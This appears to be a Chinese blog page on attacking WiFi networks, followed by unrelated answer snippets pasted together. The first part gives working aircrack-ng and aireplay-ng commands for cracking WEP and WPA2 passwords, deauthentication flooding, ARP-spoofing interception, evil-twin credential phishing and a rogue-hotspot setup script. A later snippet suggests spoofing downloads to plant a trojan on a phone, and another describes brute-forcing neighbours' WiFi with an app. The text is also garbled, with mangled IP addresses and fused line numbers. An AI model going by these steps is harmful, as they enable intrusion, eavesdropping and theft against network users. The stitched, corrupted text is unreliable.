我们攻击WIFI的第一个思路就是从保密性出发,我们希望从无线系统中获取用户的明文数据。首先,我们知道WIFI的的认证加密主要有以下四种方式:OPEN(无加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。
OPEN的WIFI没有采取认证加密措施,任意用户均可链接WIFI,用户数据在BSS(基本服务集)中明文传输,恶意用户没有任何门槛就可连接,然后通过中间人攻击即可获取用户的数据(SSL、SSH等需要其他工具)。如下图所示:
WEP、WPA、WPA2认证加密模式的WIFI需要破解获取密码,然后通过中间人或直接嗅探的方式获取用户明文数据。步骤就不详述了,WEP抓取IVS包,WPA/WPA2抓取handshake包。
WEP大概如下:
airodump-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕获ivs数据包
aireplay-ng -3 -b 目标AP的MAC -h 某一个连接该AP的station的MAC wlan1mon #发送ARP包获取加速获取ivs
aircrack-ng /workspace/sniff/airmon02ivs
WPA/WPA2大概如下:
airodump-ng -w /workspace/sniff/airmon-wpa2 --bssid 目标AP的MAC -c AP所在chanle wlan1mon #嗅探无线数据,抓取handshake包
aireplay-ng -0 5 -a 目标AP的MAC -c 某一连接AP的station的MAC wlan1mon #发送deauth包,更快的获取handshake
aircrack-ng -w 你的字典文件 /workspace/sniff/airmon-wpa2cap #破解wpa2密码
密码破解成功后即可连接AP,通过中间人的方式获取用户明文数据,或者直接用wireshark抓取加密包,然后通过airdecap-ng工具解密,然后用wireshark读取已经解密的数据包。
破解WPA、WPA2不一定成功,取决于你字典是否强大,此时我们可以想办法诱骗用户主动输入WIFI密码,比如我们创建一个和目标AP具有同样ESSID的软AP,用户可以连接上,单在浏览网页时会d出一个虚假的认证页面,告诉用户必须输入WIFI的密码,用户只要输入密码我们即可获取。可以利用fluxion、wifiphisher等工具实现。
wifiphisher将用户输入的密码当做WIFI的密码,但此密码并没有去验证,如果用户输入错误,也会提示出该密码。
而fluxion会将用户输入的密码与handshake校验,成功方认为获取到密码。
2可用性
通过使目标用户无法使用WIFI来破坏无线系统的可用性,通常通过DOS攻击来实现,比如发送大量的deauth包来迫使用户station与AP解除认证、连接。
aireplay -0 100 -a 目标AP的MAC -c攻击的station的MAC wlan1mon #发送大量的deauth包,迫使目标station无法连接AP
mdk3 wlan1mon a -a 攻击AP的MAC #mdk3可以伪造大量的station与AP连接,从而耗尽AP的资源造成DOS攻击
3真实性
(1)恶意用户进入无线系统后,可通过中间人攻击获取或修改用户数据。
ARP欺骗或DNS欺骗,ettercap工具非常方便。下面采用mitmf工具通过ARP欺骗将目标浏览网页中的所有上下颠倒。
mitmf -i wlan0 --spoof --arp --gateway 19216821 --target 19216821 --upsidedownternet
通过driftnet工具抓取目标浏览网页时的
driftnet -i wlan0
当然还可以利用中间人攻击做很多事情,比如获取cookie,嵌入js,结合beef进一步攻击等等。。。
(2)伪造AP进行钓鱼攻击
airbase -ng -e airmon wlan1mon #创建钓鱼热点
然后通过下面的脚本开启dhcp服务器(必须先安装isc-dhcp-server),开启路由,开启系统转发,开启防火墙nat等。
1 #!/bin/bash 2 3 echo '配置钓鱼热点' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpdleases 7 touch /var/lib/dhcp/dhcpdleases 8 9 ifconfig at0 up10 ifconfig at0 10001 netmask 255255255011 route add -net 10000 netmask 2552552550 gw 1000112 sysctl netipv4ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpdconf -pf /var/run/dhcpdpid at015 echo '等待启动dhcp服务器'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
此时用户可以不用密码即可连接airmon热点,并可以上网,但此时可以通过嗅探at0网卡获取用户数据。
4完整性
篡改用户数据,在WIFI攻击这块貌似用处不大。
5不可抵赖性
不能,只能是通过电脑看到自己手机上的内容。
1、以三星手机为例,将手机数据线连接至电脑,此时系统会引导手机驱动安装;
2、打开桌面上的计算机,点击便携设备下的手机设备;
3、点击Card或者Phone;
Card:手机外置卡;
Phone:手机内置卡;
4、此时就能看到手机上的内容。
嗅探,抓包,解密。liunx上这样的工具多的很。不过微信
做的很安全,信息是加密传输的。你不知道加密方式。密匙想知道聊天的记录很难。。。不过你可以这么玩,ARP或者DNS欺骗,只要下载东西就把下载地址指向你的
木马
文件。然后你就可以为所欲为了,当然前提是对方
手机
需要root,同时你获取
root权限
。我只会告诉你思路,对于实现方法如果说出来就触犯了网络安全法第二十二条规定。会被判为民事或者刑事责任。方法如下:
(1)下载360免费wifi,并安装在手机上;
(2)打开360免费wifi,可以看到自动搜索到附近的wifi信号,并且可以看到免费的和加密的。带锁的就是加密的;
(3)如果没有免费wifi,可以选择暴力破解加密wifi,点击要连的wifi;
(4)点击试试手气,这是软件开始自动破解,也就是挖掘免费wifi,这是软件自带的破译密码功能;
(5)但并不是所有的破解都可以成功,只有一些有规律的常用的密码可以破译成功,如果连上之后点击分享wifi,那么这个wifi就会成为免费wifi,其他人可以使用。不能。路由器只不过是由连接设备的记录,所以无线路由器不能嗅探微信信息。路由器工作于开放系统互连参考模型的第三层网络层的一种网络互联设备。采用某种路由算法,为在网络上传送的数据包从若干条路由中选择一条到达目的地的路径并进行转发。
手机查看谁连接自家wifi的方法:
品牌型号:华为荣耀10
系统版本:EMUI81
软件版本:手机设置、手机百度浏览器v526030
1、第一步:找到手机里的设置。
2、第二步:打开手机设置找到WLAN选项,进入。
3、第三步:在自家WiFi后面,点击这个东西,进入WiFi设定界面。
4、第四步:找到路由器这一项,查看后面的IP地址。
5、第五步:打开浏览器输入刚才路由器后面的IP地址,在出现的登陆页面后输入密码进入路由器管理页面。
6、第六步:在路由器管理页面可以直观的查看到大部分的数据,点击终端设备查看是否有别人连接上你的WiFi。
7、第七步:如果发现有,滑动后面的滑块禁止连接就可以了。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)